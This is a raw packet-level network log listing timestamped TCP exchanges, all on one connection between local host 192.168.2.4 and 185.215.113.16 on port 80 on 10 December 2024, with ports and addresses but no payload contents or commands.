Dec 10, 2024 00:42:37.439934015 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.440848112 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.440893888 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.440948963 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.440994978 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.441931009 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.441977978 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.442042112 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.442087889 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.443017006 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.443063974 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.443181992 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.443228960 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.444128036 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.444175959 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.444231033 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.444272995 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.445216894 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.445266962 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.445331097 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.445379019 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.446432114 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.446480036 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.446497917 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.446542978 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.447407961 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.447455883 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.447508097 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.447555065 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.448519945 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.448568106 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.448604107 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.448652029 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.449639082 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.449687004 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.449768066 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.449812889 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.450759888 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.450808048 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.450943947 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.450990915 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.451787949 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.451837063 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.451910019 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.451955080 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.452881098 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.452929020 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.452980995 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.453032970 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.454087973 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.454130888 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.454137087 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.454170942 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.455117941 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.455169916 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.455189943 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.455231905 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.456157923 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.456204891 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.456221104 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.456267118 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.457268953 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.457313061 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.457381964 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.457427025 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.458381891 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.458450079 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.458479881 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.458528042 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.459476948 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.459526062 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.459628105 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.459672928 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.460561991 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.460609913 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.460639000 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.460684061 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.573321104 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.573395967 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.573442936 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.573483944 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.573870897 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.573920012 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.573944092 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.573990107 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.575037956 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.575061083 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.575102091 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.575122118 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.576030970 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.576081991 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.599539042 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.599597931 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.599630117 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.599663973 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.600054979 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.600107908 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.600229025 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.600270033 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.601171017 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.601219893 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.601347923 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.601385117 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.602260113 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.602302074 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.602469921 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.602511883 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.603341103 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.603385925 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.603482962 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.603526115 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.604413986 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.604460955 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.604551077 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.604598045 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.605519056 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.605566978 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.605645895 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.605686903 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.606638908 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.606688023 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.606723070 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.606756926 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.607739925 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.607794046 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.607832909 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.608140945 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.608839989 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.608891010 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.608922958 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.608963013 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.609916925 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.609957933 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.609987974 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.610027075 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.611021996 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.611063957 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.611098051 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.611138105 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.612087011 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.612129927 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.612159014 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.612195015 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.613190889 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.613245964 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.613364935 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.613409042 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.614319086 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.614371061 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.614376068 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.614411116 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.615401983 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.615443945 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.615509987 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.615552902 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.616489887 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.616542101 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.616600990 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.616638899 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.617604017 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.617647886 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.617734909 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.617775917 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.618704081 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.618746996 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.618771076 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.618809938 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.619785070 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.619829893 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.619996071 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.620040894 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.620861053 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.620903015 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.620989084 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.621027946 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.621969938 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.622021914 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.622051001 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.622083902 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.623061895 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.623102903 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.623192072 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.623231888 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.624170065 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.624212980 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.624274969 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.624316931 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.625272036 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.625315905 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.625355959 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.625402927 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.626347065 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.626393080 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.626467943 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.626508951 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.627449036 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.627496004 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.627576113 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.627619028 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.628525972 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.628581047 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.628649950 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.628693104 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.629652977 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.629668951 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.629686117 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.629697084 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.630788088 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.630861998 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.630875111 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.630897045 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.631890059 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.631930113 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.631958961 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.631994009 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.633028984 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.633074999 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.633188963 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.633235931 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.634038925 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.634088039 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.634160995 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.634210110 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.635118961 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.635168076 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.635241032 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.635289907 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.636210918 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.636251926 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.636323929 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.636368990 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.637326002 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.637351990 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.637371063 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.637382030 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.638394117 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.638441086 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.638777971 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.638827085 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.639532089 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.639573097 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.639642000 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.639688969 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.640588999 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.640667915 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.640752077 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.640798092 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.641700983 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.641746044 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.641777039 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.641819000 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.642785072 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.642833948 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.642855883 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.642898083 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.643891096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.643940926 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.643991947 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.644037962 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.644994020 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.645042896 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.645148039 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.645195961 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.646043062 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.646089077 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.646141052 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.646188021 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.647157907 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.647203922 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.647258043 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.647301912 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.648247957 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.648293972 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.648318052 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.648360014 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.649372101 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.649418116 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.649450064 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.649488926 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.650464058 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.650511980 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.650553942 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.650597095 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.651578903 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.651626110 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.651648998 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.651693106 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.652657032 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.652703047 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.652719021 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.652765036 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.765336037 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.765367985 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.765438080 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.765491009 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.765897036 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.765947104 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.766022921 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.766072989 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.766968966 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.767026901 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.767035961 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.767086029 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.768094063 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.768141031 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.791619062 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.791687965 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.791708946 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.791760921 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.792171955 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.792222977 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.792257071 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.792299986 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.793013096 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.793061018 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.793128014 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.793174982 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.794111967 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.794157028 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.794215918 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.794264078 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.795223951 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.795274019 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.795310020 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.795356035 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.796317101 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.796364069 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.796399117 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.796442986 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.797424078 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.797489882 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.797492027 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.797528028 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.798502922 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.798551083 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.798634052 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.798681021 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.799588919 CET	80	49759	185.215.113.16	192.168.2.4
Dec 10, 2024 00:42:37.799635887 CET	49759	80	192.168.2.4	185.215.113.16
Dec 10, 2024 00:42:37.799721003 CET	80	49759	185.215.113.16	192.168.2.4
